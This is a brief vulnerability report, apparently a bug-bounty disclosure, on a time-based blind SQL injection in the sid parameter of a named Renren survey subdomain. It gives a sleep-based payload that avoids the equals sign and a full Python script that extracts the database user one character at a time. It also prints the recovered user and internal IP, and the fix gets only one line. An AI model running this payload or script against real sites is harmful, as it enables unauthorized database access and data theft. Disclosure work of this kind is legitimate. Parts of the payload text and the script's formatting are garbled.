MySQL injection for Renren substation (without equal sign injection, with verification script)

MySQL injection for Renren substation (without equal sign injection, with verification script)

The SQL injection solution for Renren sub-station is incomplete. You can inject the code without the equal sign and attach a verification script.

Injection point:

http://survey.game.renren.com/index.php?sid=28299

The sid parameter can be injected.

Use the sleep function to guess a single character:

Sleep (1-abs (sign (ascii (mid (lower (user () from (% s) for (1)-% s )))

Take the ascii code of one character each time, compare with the ascii code in the list one by one, take the absolute value of the symbol.

If they are equal, the symbol is 0, and the absolute value is 0, which will delay.

If not, the symbols are 1 or-1, and the absolute value is 1 without delay.

Guess user () and get:

survey@10.30.32.152

Script:

#encoding=gbkimport httplibimport timeimport stringimport sysimport randomimport urllibheaders = {    'Cookie': '',    'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',}payloads = list(string.ascii_lowercase)for i in range(0,10):    payloads.append(str(i))payloads += ['@','_', '.']print 'start to retrive MySQL user:'user = ''for i in range(1,20):    for payload in payloads:        conn = httplib.HTTPConnection('survey.game.renren.com', timeout=60)        s = '28299 and sleep(1-abs(sign(ascii(mid(lower(user())from(%s)for(1)))-%s)))' % (i, ord(payload))        conn.request(method='GET',                     url='/index.php?sid='+urllib.quote(s),                     headers=headers)        start_time = time.time()        conn.getresponse().read().decode('utf-8')        if time.time() - start_time > 1.0:            user += payload            print '\n[in progress]', user            break        else:            print '.',print '\nMySQL user is', user

 

Solution:

Forced conversion and filtering